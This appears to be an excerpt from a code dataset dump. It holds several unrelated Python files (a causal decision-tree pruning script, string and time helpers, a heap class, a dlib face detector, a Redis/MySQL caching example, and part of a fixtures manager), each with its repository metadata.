class_values.append(i[1])\r\n # print('Classlabel: ', class_values)\r\n # print('data: 
', data)\r\n ## We should calculate the tao value here not MSE\r\n # mse_parent = mean_sqaured_error(class_values)\r\n # print(\"mse for parent\",mse_parent)\r\n # print(\"Entropy of parrent\",entropy_of_par_attr)\r\n max_tao = 0\r\n tao_child = []\r\n theta = 0\r\n best_index_left_list = []\r\n best_index_right_list = []\r\n class_labels_list_after_split = []\r\n # print(data)\r\n # data = list(data)\r\n data.sort()\r\n '''\r\n data = set(data)\r\n data = list(data)\r\n '''\r\n # print('Data: ', data)\r\n bas_num = 10\r\n part = int(len(data) / bas_num)\r\n while part < minsize:\r\n bas_num -= 1\r\n part = int(len(data) / bas_num)\r\n while part >= maxbucketNum:\r\n bas_num += 1\r\n part = int(len(data) / bas_num)\r\n step = bas_num\r\n # print(\"step: \", step)\r\n prev = 0\r\n while (step + prev) < len(data):\r\n cur_theta = data[step + prev]\r\n # print(cur_theta)\r\n index_less_than_theta_list = []\r\n values_less_than_theta_list = []\r\n index_greater_than_theta_list = []\r\n values_greater_than_theta_list = []\r\n count = 0\r\n left_TreatNum = 0\r\n left_ControlNum = 0\r\n right_TreatNum = 0\r\n right_ControlNum = 0\r\n ### enumerate : both index and value:https://blog.csdn.net/liu_xzhen/article/details/79564455\r\n for c, j in enumerate(attri_list): # it could be optimized\r\n # print(c, 'J is : ', j)\r\n label = j[1]\r\n if j[0] <= cur_theta:\r\n # print(\"J[0] less\", j[0])\r\n values_less_than_theta_list.append(j)\r\n index_less_than_theta_list.append(c)\r\n if label[1]:\r\n left_TreatNum += 1\r\n else:\r\n left_ControlNum += 1\r\n else:\r\n # print(\"J[0] grater\",j[0])\r\n values_greater_than_theta_list.append(j)\r\n index_greater_than_theta_list.append(c)\r\n if label[1]:\r\n right_TreatNum += 1\r\n else:\r\n right_ControlNum += 1\r\n # count += 1\r\n\r\n # print('values_greater_than_theta_list: ', values_greater_than_theta_list)\r\n # print(\"Len og less list\",len(index_less_than_theta_list))\r\n # print(\"len og greater list\",len(index_greater_than_theta_list))\r\n if right_ControlNum < 20 or right_TreatNum < 20:\r\n # print(\"less minsize the num of left\", len(values_greater_than_theta_list), \" the num of righ: \", len(values_less_than_theta_list))\r\n prev += step\r\n continue\r\n if left_ControlNum < 20 or left_TreatNum < 20:\r\n # print(\"less minsize the num of left\", len(values_greater_than_theta_list), \" the num of righ: \", len(values_less_than_theta_list))\r\n prev += step\r\n continue\r\n tao_left = taoob(values_less_than_theta_list)\r\n # print(entropy_of_less_attribute)\r\n tao_right = taoob(values_greater_than_theta_list)\r\n ## we use sum sqaure here\r\n tao_split = tao_left ** 2 + tao_right ** 2\r\n if tao_split > max_tao:\r\n max_tao = tao_split\r\n tao_child = [tao_left, tao_right]\r\n theta = cur_theta\r\n best_index_left_list = index_less_than_theta_list\r\n best_index_right_list = index_greater_than_theta_list\r\n class_labels_list_after_split = values_less_than_theta_list + values_greater_than_theta_list\r\n prev += step\r\n # print('prev changed: ', prev)\r\n\r\n # print('split left: ', best_index_left_list)\r\n # print('split right: ', best_index_right_list)\r\n return max_tao, theta, best_index_left_list, best_index_right_list, class_labels_list_after_split, tao_child\r\n\r\n # method to select the best feature out of all the features.\r\n ### the dict_rep is\r\n def best_feature(self, dict_rep, minsize, maxbucketNum):\r\n # dict_theta = {}\r\n # dict_theta = {}\r\n key_value = None\r\n best_tao_split = -1\r\n best_theta = 0\r\n 
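# The loop below keeps the candidate split with the largest\r\n        # tao_left ** 2 + tao_right ** 2 (computed in cal_best_theta_value),\r\n        # i.e. the threshold that separates the estimated treatment\r\n        # effect most sharply between the two children.\r\n        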
best_index_left_list = []\r\n best_index_right_list = []\r\n # best_mse_left = -1\r\n # best_mse_right = -1\r\n best_class_labels_after_split = []\r\n tmp_list = []\r\n best_tao_child = []\r\n for ke in dict_rep.keys():\r\n # print(\"Key now is\", ke, 'dict_rep is ', dict_rep[ke])\r\n tao_split, theta, index_left_list, index_right_list, class_labels_after_split, tao_child = self.cal_best_theta_value(ke, dict_rep[ke], minsize, maxbucketNum)\r\n # print(\"Best theta is\", ke,info_gain,theta,index_left_list)#,index_right_list)\r\n if tao_split > best_tao_split:\r\n best_tao_split = tao_split\r\n best_tao_child = tao_child\r\n best_theta = theta\r\n key_value = ke\r\n best_index_left_list = index_left_list\r\n best_index_right_list = index_right_list\r\n best_class_labels_after_split = class_labels_after_split\r\n tmp_list.append(key_value)\r\n # tmp_list.append(best_info_gain)\r\n tmp_list.append(best_theta)\r\n tmp_list.append(best_index_left_list)\r\n tmp_list.append(best_index_right_list)\r\n tmp_list.append(best_class_labels_after_split)\r\n tmp_list.append(best_tao_child)\r\n return tmp_list\r\n\r\n def get_remainder_dict(self, dict_of_everything, index_split):\r\n # global fea_list\r\n splited_dict = {}\r\n for ke in dict_of_everything.keys():\r\n val_list = []\r\n modified_list = []\r\n l = dict_of_everything[ke]\r\n # print(ke,index_left_split)\r\n # print(l)\r\n for i, v in enumerate(l):\r\n # print(i,v)\r\n if i not in index_split:\r\n # print(ke,i,v)\r\n modified_list.append(v)\r\n val_list.append(v[1])\r\n # print(modified_list)\r\n splited_dict[ke] = modified_list\r\n return splited_dict, val_list\r\n\r\n # method to create decision tree\r\n def create_decision_tree(self, dict_of_everything, class_val, eta_min_val, Featurename, Tao, depth): # ,fea_list):\r\n if len(class_val) < eta_min_val: ### if the number of the leaf < the minest number we having setting\r\n # majority_val = self.cal_mean_class_values(class_val)\r\n # print(\"Leaf node for less than 8 is\",majority_val, len(class_val))#,class_val)\r\n root_node = Node(Tao, None, None, None, None, None, depth, True, None)\r\n # print('Node number: ', len(class_val))\r\n return root_node\r\n else:\r\n print(\"the depth: \", depth)\r\n best_features_list = self.best_feature(dict_of_everything, 5, 10)\r\n # print(best_features_list)\r\n node_name = best_features_list[0]\r\n theta = best_features_list[1]\r\n index_left_split = best_features_list[2]\r\n print(\"Length of left split\", len(index_left_split))#,index_left_split)\r\n index_right_split = best_features_list[3]\r\n print(\"Length of right split\", len(index_right_split))#,index_right_split)\r\n ## use tao to replace the class_values\r\n class_values = best_features_list[4]\r\n Taovalue = best_features_list[5]\r\n if Taovalue == []:\r\n root_node = Node(Tao, None, None, None, None, None, depth, True, None)\r\n return root_node\r\n print(\"class values\", Taovalue)\r\n print(\"feature: \", Featurename[node_name], \"theta: \", theta)\r\n left_dict, class_val1 = self.get_remainder_dict(dict_of_everything, index_left_split)\r\n # print(\"index of left split\",len(index_left_split))\r\n # print(\"Left class values is\",len(class_val1))\r\n right_dict, class_val2 = self.get_remainder_dict(dict_of_everything, index_right_split)\r\n # print(\"indx of right split\",len(index_right_split))\r\n # print(\"right class values is\",len(class_val2))\r\n ##Add the tao value of each child note here!!!\r\n leftchild = self.create_decision_tree(left_dict, class_val1, eta_min_val, Featurename, 
Taovalue[0], depth+1)\r\n # leftchild = None\r\n rightchild = self.create_decision_tree(right_dict, class_val2, eta_min_val, Featurename, Taovalue[1], depth+1)\r\n root_node = Node(Tao, leftchild, rightchild, Featurename[node_name], node_name, theta, depth, False, None)\r\n return root_node\r\n\r\n # method to predict the values for test data\r\n def predict(self, X, root):\r\n predicted_list = []\r\n for row in X:\r\n y_pred = self.classify(row, root)\r\n predicted_list.append(y_pred)\r\n return predicted_list\r\n\r\n def classify(self, row, root):\r\n dict_test = {}\r\n for k, j in enumerate(row):\r\n dict_test[k] = j\r\n # print(dict_test)\r\n current_node = root\r\n while not current_node.leaf:\r\n if dict_test[current_node.root_value] <= current_node.theta:\r\n current_node = current_node.root_left\r\n else:\r\n current_node = current_node.root_right\r\n # print(current_node.root_value,dict_test[current_node.root_value], current_node.theta)\r\n return current_node.root_value\r\n\r\n\r\n'''\r\ndef CountChildren (Tree):\r\n Num_leaf = 0\r\n Num_node = 0\r\n if Tree.leaf:\r\n # print('Here ',Tree.feature)\r\n Num_leaf += 1\r\n else:\r\n Num_node += 1\r\n LeftTree = Tree.root_left\r\n # print('left Tree', LeftTree.root_left)\r\n # print('Tree leaf ', LeftTree.leaf)\r\n RightTree = Tree.root_right\r\n Add_node, Add_leaf = CountChildren(LeftTree)\r\n Num_leaf += Add_leaf\r\n Num_node += Add_node\r\n Add_node, Add_leaf = CountChildren(RightTree)\r\n Num_leaf += Add_leaf\r\n Num_node += Add_node\r\n # print('Num :', Num_node)\r\n return Num_node, Num_leaf\r\n'''\r\n\r\n\r\ndef CountChildren (Tree):\r\n Num_node = 0\r\n if Tree.root_left == None and Tree.root_right == None:\r\n # print('Here ',Tree.root_left, Tree.root_right)\r\n Num_node += 1\r\n else:\r\n # print('There ',Tree.root_left, Tree.root_right)\r\n LeftTree = Tree.root_left\r\n # print('left Tree', LeftTree.root_left)\r\n # print('Tree leaf ', LeftTree.leaf)\r\n RightTree = Tree.root_right\r\n Num_node += CountChildren(LeftTree)\r\n Num_node += CountChildren(RightTree)\r\n # print('Num :', Num_node)\r\n return Num_node\r\n\r\n\r\ndef Taocv(Label): # Edit\r\n # print('label: ', len(Label))\r\n number_sample = len(Label)\r\n if number_sample == 0:\r\n # print('THIS IS SOME WRONG!!!')\r\n return 0\r\n sum0 = 0\r\n sum1 = 0\r\n tot0 = 0\r\n tot1 = 0\r\n for item in Label:\r\n label = item\r\n # print('666 ', label[0])\r\n Y = label[0]\r\n label[3] = 0.5\r\n if label[1]:\r\n # print(label[1], label[4])\r\n sum1 += Y / label[3]\r\n tot1 += 1 / label[3]\r\n else:\r\n # print(label[1], 1 - label[4])\r\n sum0 += Y / (1 - label[3])\r\n tot0 += 1 / (1 - label[3])\r\n '''\r\n print('sum0 = ', sum0)\r\n print('sum1 = ', sum1)\r\n print('tot0 = ', tot0)\r\n print('tot1 = ', tot1)\r\n '''\r\n if tot1 == 0:\r\n Acc = 0\r\n else:\r\n Acc = sum1 / tot1\r\n if tot0 == 0:\r\n Ref = 0\r\n else:\r\n Ref = sum0 / tot0\r\n taoob = Acc - Ref\r\n # print('taoob : ', taoob)\r\n tao = sum(taoob)\r\n # print(\"tao : \", tao)\r\n return tao\r\n\r\n\r\n# calculate the number of leafs in these suntrees and the Q_prune of the tree and subtrees\r\ndef CountNodes(Tree): # EDIT\r\n if Tree.leaf:\r\n return 1, None, None, Tree.depth, Tree.root_value ** 2\r\n Node_left, Q_left_min, dic_left_prune, l_depth, left_leaf_value = CountNodes(Tree.root_left)\r\n Node_righ, Q_righ_min, dic_righ_prune, r_depth, righ_leaf_value = CountNodes(Tree.root_right)\r\n Node_number = Node_left + Node_righ\r\n leaf_value = left_leaf_value + righ_leaf_value\r\n dic_Q_prune = {}\r\n Q_min = 
3333333\r\n if Q_left_min and Q_righ_min:\r\n if Q_left_min < Q_righ_min:\r\n dic_Q_prune = dic_left_prune\r\n Q_min = Q_left_min\r\n depth = l_depth\r\n else:\r\n dic_Q_prune = dic_righ_prune\r\n Q_min = Q_righ_min\r\n depth = r_depth\r\n elif Q_left_min:\r\n dic_Q_prune = dic_left_prune\r\n Q_min = Q_left_min\r\n depth = l_depth\r\n elif Q_righ_min:\r\n dic_Q_prune = dic_righ_prune\r\n Q_min = Q_righ_min\r\n depth = r_depth\r\n\r\n Q_prune = (leaf_value / Node_number - Tree.root_value ** 2) / (Node_number - 1)\r\n Tree.Prune_value = Q_prune\r\n if Q_prune < Q_min:\r\n Q_min = Q_prune\r\n dic_Q_prune = Tree\r\n depth = Tree.depth\r\n\r\n return Node_number, Q_min, dic_Q_prune, depth, leaf_value\r\n\r\n\r\ndef FindSubTree(Tree, Q, depth):\r\n SearchEnding = 0\r\n if Tree.leaf:\r\n return Tree, 0\r\n if Tree.Prune_value == Q and Tree.depth == depth:\r\n # print('Merge')\r\n Tree.root_left = None\r\n Tree.root_right = None\r\n Tree.leaf = True\r\n return Tree, 1\r\n Tree.root_left, SearchEnding = FindSubTree(Tree.root_left, Q, depth)\r\n if SearchEnding:\r\n return Tree, 1\r\n Tree.root_right, SearchEnding = FindSubTree(Tree.root_right, Q, depth)\r\n if SearchEnding:\r\n return Tree, 1\r\n return Tree, 0\r\n\r\n\r\n# to get the Q_prune value\r\ndef Find_least_Qp(Tree): # edit\r\n Node_number, Q_min, dic_Q_prune, depth, leaf_value = CountNodes(Tree)\r\n subTree, search = FindSubTree(Tree, Q_min, depth)\r\n alpha = Q_min\r\n return subTree, alpha\r\n\r\n\r\n# use test data to get MSE\r\ndef Get_MSE(Tree, X_test, Y_test, MSECV, MSETR): # edit\r\n if Tree.root_left == None and Tree.root_right == None:\r\n taocv = Taocv(Y_test) # you should change the form of the input data X_test\r\n MSECV += taocv * Tree.root_value\r\n MSETR += Tree.root_value ** 2\r\n return MSECV, MSETR\r\n else:\r\n X_left = []\r\n Y_left = []\r\n X_right = []\r\n Y_right = []\r\n Comp = Tree.theta\r\n key = Tree.FeatureNumber\r\n #print('Comp: ', Comp, 'Key: ', key)\r\n # print(X_test[0][key])\r\n for item, subset in enumerate(X_test):\r\n temp = subset\r\n if temp[key] < Comp:\r\n X_left.append(temp)\r\n Y_left.append(Y_test[item])\r\n else:\r\n X_right.append(temp)\r\n Y_right.append(Y_test[item])\r\n if len(Y_left) > 0:\r\n print('lY: ', len(Y_left))\r\n dCV, dTR = Get_MSE(Tree.root_left, X_left, Y_left, MSECV, MSETR)\r\n MSECV += dCV\r\n MSETR += dTR\r\n if len(Y_right) > 0:\r\n print('rY: ', len(Y_right))\r\n print('leaf: ', Tree.root_right.leaf)\r\n dCV, dTR = Get_MSE(Tree.root_right, X_right, Y_right, MSECV, MSETR)\r\n MSECV += dCV\r\n MSETR += dTR\r\n return MSECV, MSETR\r\n\r\n\r\ndef SetCross(Subtree, X_test, Y_test):\r\n Number = CountChildren(Subtree)\r\n print(\"the child node: \", Number)\r\n MSECV, MSETR = Get_MSE(Subtree, X_test, Y_test, 0, 0)\r\n print('MSECV: ', MSECV, 'MSETR: ', MSETR)\r\n Number_test = len(X_test)\r\n # print(\"Number of test data:\", Number_test)\r\n MSE_tao = -2 / Number_test * MSECV + MSETR / Number_test\r\n print('MSE_tao :', MSE_tao)\r\n return MSE_tao\r\n\r\n\r\n# prune in crossdata a\r\ndef CrossPprune(Tree, X_test, Y_test): # edit\r\n from copy import deepcopy\r\n # print('Y len :', len(Y_test))\r\n # print('Y:', Y_test[1])\r\n Tree_now = deepcopy(Tree)\r\n Nodes = []\r\n Paralpha = []\r\n Nodes.append(deepcopy(Tree_now))\r\n Paralpha.append(SetCross(deepcopy(Tree_now), X_test, Y_test))\r\n while 1:\r\n if Tree_now.root_left == None and Tree_now.root_right == None:\r\n # if Tree_now.leaf:\r\n # print('break tree:', Tree_now)\r\n break\r\n Tree_now, alpha = Find_least_Qp(Tree_now) 
# remember let tree.leaf = True after merge\r\n # print('Type: ', type(Tree_now))\r\n Nodes.append(deepcopy(Tree_now))\r\n Paralpha.append(alpha)\r\n print('Nodes: ', Nodes)\r\n print(\"len node: \", len(Nodes))\r\n print(\"Alpha: \", Paralpha)\r\n MSQ_min = 2147483648 # a small number -2147483648\r\n AnsList = []\r\n best_node = Tree\r\n best_alpha = None\r\n for item, sub in enumerate(Nodes):\r\n # print('each item :', sub)\r\n MSQ = SetCross(sub, X_test, Y_test)\r\n if MSQ <= MSQ_min:\r\n MSQ_min = MSQ\r\n best_node = sub\r\n best_alpha = Paralpha[item]\r\n AnsList.append(MSQ_min)\r\n AnsList.append(best_node)\r\n AnsList.append(best_alpha)\r\n return AnsList\r\n'''\r\ndef prune(Tree, alpha, k, eta_min):\r\n dif = 0\r\n rdif = 0\r\n LeftTree = Tree.root_left\r\n RightTree = Tree.root_right\r\n # pass\r\n if LeftTree.leaf == 0:\r\n LeftTree, ldif = prune(LeftTree, alpha, k, eta_min)\r\n dif += ldif\r\n k -= ldif\r\n if RightTree.leaf == 0:\r\n RightTree, rdif = prune(RightTree, alpha, k, eta_min)\r\n dif += rdif\r\n k -= rdif\r\n # if there still have child tree, which meaning that parent don't need to prune\r\n if not LeftTree.leaf or not RightTree.leaf:\r\n Tree.root_left = LeftTree\r\n Tree.root_right = RightTree\r\n return Tree, dif\r\n else: # decision if need prune\r\n Q_prune_child = LeftTree.root_value ** 2 + RightTree.root_value ** 2 - alpha * k\r\n Q_prune_parent = Tree.root_value ** 2 - alpha * (k - 1)\r\n if (Q_prune_child - Q_prune_parent) < eta_min:\r\n print('Prune happened! : ')\r\n Tree.leaf = True\r\n Tree.root_left = None\r\n Tree.root_right = None\r\n dif += 1\r\n # print('k: ', k)\r\n return Tree, dif\r\n'''\r\n\r\n\r\ndef main(num_arr, eta_min, Pi):\r\n eta_min_val = round(eta_min * num_arr.shape[0])\r\n print('eta_min_val : ', eta_min_val)\r\n # randomly shuffle the array so that we can divide the data into test/training\r\n # random_arr1 = random_numpy_array(num_arr)\r\n # divide data into test labels,test features,training labels, training features\r\n Feature_name, test_attri_list, test_class_names_list, training_attri_list, training_class_names_list = generate_set(num_arr, Pi, CrossTest=1)\r\n accu_count = 0\r\n test_fin_mse = 0\r\n pred_fin = 0\r\n # ten fold iteration for each eta-min value\r\n for i in range(1):\r\n # build a dictionary with class labels and respective features values belonging to that class\r\n dict_of_input, fea = build_dict_of_attributes_with_class_values(training_attri_list[i], training_class_names_list[i])\r\n # print(dict_of_input)\r\n # instantiate decision tree instance\r\n build_dict = DecisionTree()\r\n Tao_initial = Prework(dict_of_input)\r\n # build the decision tree model.\r\n dec = build_dict.fit(dict_of_input, training_class_names_list[i], eta_min_val, Feature_name, Tao_initial)\r\n # predict the class labels for test features\r\n '''\r\n l = build_dict.predict(test_attri_list[i], dec)\r\n # calculate the mean squared error measure for predicited test data\r\n mse = accuracy_for_predicted_values(test_class_names_list[i], l)\r\n # print(\"Number of right values are\",right,\"Wrong ones are\",wrong)\r\n # accu_count += accu\r\n test_fin_mse += mse\r\n # pred_fin += pred\r\n print(\"Average MSE for eta min of\", eta_min, \"is\", float(test_fin_mse) / 10) \r\n '''\r\n Num_node = CountChildren(dec)\r\n print('Num of node is ', Num_node)\r\n print('The original tree: ', dec)\r\n print('Y: ', len(test_class_names_list[0]))\r\n AnsList = CrossPprune(dec, test_attri_list[0], test_class_names_list[0])\r\n MSQ = AnsList[0]\r\n best_dec = 
AnsList[1]\r\n best_alpha = AnsList[2]\r\n print('The value of alpha: ', best_alpha)\r\n Num_node = CountChildren(best_dec)\r\n print('After pruning, num of node is ', Num_node)\r\n print(\"Average MSE for eta min of \", MSQ)\r\n print(\"Tree: \", best_dec)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n '''if len(sys.argv) == 2: ### sys.argv ???? what's mean ? is any wrong here?\r\n newfile = sys.argv[1]\r\n # load the data file and do the preprocessing\r\n num_arr = load_csv(newfile)\r\n # for each threshold value run the classifier for 10 cross-validation\r\n eta_min_list = [0.05, 0.10, 0.15, 0.20]\r\n for i in eta_min_list:\r\n main(num_arr, i)'''\r\n newfile = 'simulation1.csv'\r\n # load the data file and do the preprocessing\r\n Pi = lr.CaculatePi(newfile)\r\n num_arr = load_csv(newfile)\r\n # for each threshold value run the classifier for 10 cross-validation\r\n eta_min_list = [0.15, 0.20, 0.25, 0.30]\r\n main(num_arr, 0.1, Pi)\r\n\r\n #for i in eta_min_list:\r\n # main(num_arr, i, Pi)\r\n","sub_path":"SCT_compare_in_simulation1.py","file_name":"SCT_compare_in_simulation1.py","file_ext":"py","file_size_in_byte":29828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"464833176","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n# Author: Mario S. Könz \n# Date: 31.03.2015 09:24:49 CEST\n# File: io_manip.py\n\nfrom .is_instance import *\nfrom .decorator_collection import listable\nfrom .termcolor import color\n\nfrom functools import partial\nimport re\n\n__all__ = [\"to_number\", \"to_str\", \"split_clean\", \"sstr\", \"time_int\", \"time_str\", \"ms_time_str\", \"dyn_time_str\", \"padding\"]\n\n@listable\ndef to_number(obj, strip_quotes = True):\n \"\"\"\n Tries to convert the input string into an int, if that doesn't work into a float and if that also fails, returns the string again.\n \"\"\"\n if is_dict(obj):\n return dict([(k, to_number(v, strip_quotes)) for k, v in obj.items()])\n \n try:\n res = int(obj)\n return res\n except:\n pass\n try:\n res = float(obj)\n return res\n except:\n pass\n \n test = obj.strip()\n if len(test) != 0 and test[0] == \"[\" and test[-1] == \"]\":\n #~ l = test[1:-1].split(\",\") #too easy, splits [[a, b], [c, d]] -> [[a<> b]<> [c<> d]]\n l = test[1:-1].split(\",\")\n l = re.split(\",(?=(?:[^\\\\[\\\\]]*(?:\\\\[[^\\\\[\\\\]]*\\\\]))*[^\\\\[\\\\]]*$)\", test[1:-1]) # splits only , outside of [] bc of recursive lists [[a, b], [c, d]]\n \n if len(l) == 1 and l[0] == \"\":\n return []\n \n return to_number(l, strip_quotes)\n \n if strip_quotes == True:\n return re.sub('^[\\s]*([\"\\'])([\\s\\S]*)(\\\\1)$', \"\\\\2\", obj)\n return obj\n\ndef to_str(obj, add_quotes = True):\n if is_list(obj):\n strs = []\n for o in obj:\n strs.append(to_str(o, add_quotes))\n res = \"[\" + \",\".join(strs) + \"]\"\n return res\n elif is_dict(obj):\n return dict([(k, to_str(v, add_quotes)) for k, v in obj.items()])\n elif is_str(obj):\n if add_quotes:\n if \"'\" in obj:\n return '\"{}\"'.format(obj)\n else:\n return \"'{}'\".format(obj)\n #~ return str([obj])[1:-1] #trick since the list chooses the right quotes\n else:\n return obj\n else:\n return str(obj)\n\n@listable\ndef split_clean(string, strip_quotes = False):\n string = re.sub(\"^[\\\\s]+|[\\\\s]+$\", \"\", string) # remove front and back whitespace (strip would also work)\n not_in_quotes = '(?=(?:[^\"\\']*(?:\"[^\"]*\"|\\'[^\\']*\\'))*[^\"\\']*$)'\n e = '\\\\s+'+not_in_quotes # split on whitespace sections but not in \"\" or ''\n prog = re.compile(e)\n 
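# Illustrative behaviour of split_clean, inferred from the regex above\n    # (an assumption, not the original author's examples):\n    #   split_clean("a  'b c'  d")                      -> ['a', "'b c'", 'd']\n    #   split_clean("a  'b c'  d", strip_quotes = True)  -> ['a', 'b c', 'd']\n    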
res = prog.split(string)\n    if strip_quotes:\n        for i in range(len(res)):\n            res[i] = re.sub('^(["\\'])([\s\S]*)(\\1)$', "\\2", res[i]) #strips "" or '' if found at ^ and $\n        return res\n    else:\n        return res\n\ndef sstr(obj, length = 50):\n    sv = str(obj)\n    if len(sv) > length: # shorten overly long objects to roughly the requested length\n        sv = sv[:length//2] + " ...{}... ".format(len(sv) - length) + sv[-length//2:]\n    return sv\n\n#------------------- time conversion 00:00:00 -> sec -------------------\ndef time_int(t_str):\n    t_str = to_number(t_str.split(":"))\n    return 3600 * t_str[0] + 60 * t_str[1] + t_str[2]\n\n#------------------- time conversion sec -> 00:00:00 -------------------\ndef time_str(sec_int):\n    return "{:02d}:{:02d}:{:02d}".format(int(sec_int / 3600), int(sec_int / 60) % 60, int(sec_int) % 60)\n\ndef ms_time_str(sec_float):\n    if sec_float < 60:\n        return "{:.1f}s".format(sec_float)\n    else:\n        return "{}m {:.0f}s".format(int(sec_float/60), sec_float%60)\n    \ndef dyn_time_str(t_int):\n    y, d, h, m, s = [int(t_int / (60 * 60 * 24 * 365))\n            , int(t_int / (60 * 60 * 24)) % 365\n            , int(t_int / (60 * 60)) % 24\n            , int(t_int / (60)) % 60\n            , int(t_int) % 60]\n    if d == 0:\n        return "{:02d}:{:02d}:{:02d}".format(h, m, s)\n    else:\n        res = ""\n        if y > 0:\n            res += "{}y ".format(y)\n        res += "{}d {:02d}h".format(d, h)\n        return res\n\ndef padding(s, modulo, char = " "):\n    """\n    Padding a string to a multiple length of modulo.\n    """\n    if is_bytes(s):\n        char = char.encode()\n    \n    if len(s) % modulo != 0:\n        return s.ljust(len(s) + modulo - len(s) % modulo, char)\n    else:\n        return s\n","sub_path":"ptools/io_manip.py","file_name":"io_manip.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"225106849","text":"class Heap:\n\tdef __init__(self):\n\t\tself.m_heap = []\n\n\tdef empty(self):\n\t\treturn len(self.m_heap) == 0\n\n\tdef size(self):\n\t\treturn len(self.m_heap)\n\n\tdef print_heap(self):\n\t\tprint(self.m_heap)\n\n\tdef push(self, n):\n\t\tpos = len(self.m_heap)\n\t\tself.m_heap.append(n)\n\t\twhile (pos != 0 and self.comp(pos, (pos-1)//2)):\n\t\t\tself.swap(pos, (pos-1)//2)\n\t\t\tpos = (pos-1)//2\n\n\tdef pop(self):\n\t\tlength = len(self.m_heap)\n\t\tif length == 0:\n\t\t\treturn None\n\t\ttemp = self.m_heap[0]\n\t\tif length == 1:\n\t\t\tdel self.m_heap[0]\n\t\t\treturn temp\n\t\tself.m_heap[0] = self.m_heap[-1]\n\t\tdel self.m_heap[-1]\n\t\tself.relocate_top(length-1, 0)\n\t\treturn temp\n\n\n\tdef relocate_top(self, length, pos):\n\t\tleft = 2 * pos + 1\n\t\tright = 2 * pos + 2\n\t\tif (left < length and right < length):\n\t\t\tswap_pos = self.greater(left, right)\n\t\t\tif not self.comp(pos, swap_pos):\n\t\t\t\tself.swap(pos, swap_pos)\n\t\t\t\tself.relocate_top(length, swap_pos)\n\t\telif (left < length):\n\t\t\tif not self.comp(pos, left):\n\t\t\t\tself.swap(pos, left)\n\t\t\t\tself.relocate_top(length, left)\n\t\telif (right < length):\n\t\t\tif not self.comp(pos, right):\n\t\t\t\tself.swap(pos, right)\n\t\t\t\tself.relocate_top(length, right)\n\t\treturn\n\n\n\tdef greater(self, a, b):\n\t\treturn a if self.m_heap[a] > self.m_heap[b] else b\n\n\tdef comp(self, a, b):\n\t\treturn True if self.greater(a, b) == a else False\n\n\tdef swap(self, a, b):\n\t\ttemp = self.m_heap[a]\n\t\tself.m_heap[a] = self.m_heap[b]\n\t\tself.m_heap[b] = temp\n\n\nclass MinHeap(Heap):\n\tdef greater(self, a, b):\n\t\treturn a if self.m_heap[a] < self.m_heap[b] else b\n\n\n\nif __name__ == 
'__main__':\n\ta = MinHeap()\n\tb = [17,80,35,41,70,56,75,58,57,53,88,46,12,10,69,84,86,37,67,40,]\n\tfor i in b:\n\t\ta.push(i)\n\tc = [a.pop() for i in range(20)]\n\tprint(c)\n","sub_path":"utils/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"409412850","text":"import cv2\nimport dlib\nimport sys\n\n# Get user supplied values\nimagePath = sys.argv[1]\n\n# Create dlib face detector\ndetector=dlib.get_frontal_face_detector()\n\n# Read the image\nimage = cv2.imread(imagePath)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Detect faces in the image\nrects = detector(gray, 0)\n\nprint("Found {0} faces!".format(len(rects)))\n\n# Draw a rectangle around the faces\ni = 0\nfor rect in rects:\n\ti = i + 1\n\tcv2.rectangle(\n\t\timage, \n\t\t(rect.left(), rect.top()), \n\t\t(rect.right(), rect.bottom()), \n\t\t(0, 255, 0), \n\t\t2\n\t)\n\tcv2.putText(\n\t\timage, \n\t\t"Face@{}".format(i), \n\t\t(rect.left(), rect.top()), \n\t\tcv2.FONT_HERSHEY_SIMPLEX, \n\t\t0.5, \n\t\t(255, 0, 255), \n\t\t1\n\t)\n\ncv2.imshow("Faces found Result", image)\ncv2.waitKey(0)\n","sub_path":"face_detect_dlib.py","file_name":"face_detect_dlib.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"343328625","text":"import pymysql\nimport redis\n\n\ndb=pymysql.connect(host='127.0.0.1',\n                   user='root',\n                   password='123456',\n                   database='userdb',\n                   port=3306,\n                   charset='utf8'\n                   )\n\nr=redis.Redis(host='127.0.0.1',db=0,port=6379)\n\nusername=input("Enter username: ")\nresult=r.hmget(username,'gender','age')\n# hmget returns a list of field values; a cache hit means they are present\nif result[0] is not None:\n    print(result[0],result[1])\nelse:\n    cursor=db.cursor()\n    cursor.execute('select gender,age from user where username=%s',[username])\n    userinfo=cursor.fetchall()\n    if not userinfo:\n        print("User not found in MySQL")\n    else:\n        userdict={\n            'gender':userinfo[0][0],\n            'age':userinfo[0][1]\n        }\n        r.hmset(username,userdict)\n        r.expire(username,60*5)\n        print("Loaded into Redis")\n\n","sub_path":"untitled/month05/redis/redis_mysql.py","file_name":"redis_mysql.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"88829719","text":"from __future__ import print_function\n\nfrom glob import glob\nfrom itertools import chain\nimport os\n\nfrom charlatan import _compat\nfrom charlatan.depgraph import DepGraph\nfrom charlatan.file_format import load_file\nfrom charlatan.fixture import Fixture\nfrom charlatan.fixture_collection import ListFixtureCollection\nfrom charlatan.fixture_collection import DictFixtureCollection\n\nALLOWED_HOOKS = ("before_save", "after_save", "before_install",\n                 "after_install")\nROOT_COLLECTION = "root"\n\n\ndef is_sqlalchemy_model(instance):\n    """Return True if instance is an SQLAlchemy model instance."""\n\n    from sqlalchemy.orm.util import class_mapper\n    from sqlalchemy.orm.exc import UnmappedClassError\n\n    try:\n        class_mapper(instance.__class__)\n\n    except UnmappedClassError:\n        return False\n\n    else:\n        return True\n\n\ndef make_list(obj):\n    """Return list of objects if necessary."""\n    if isinstance(obj, _compat.string_types):\n        return (obj, )\n    return obj\n\n\nclass FixturesManager(object):\n\n    """\n    Manage Fixture objects.\n\n    :param Session db_session: sqlalchemy Session object\n\n    .. 
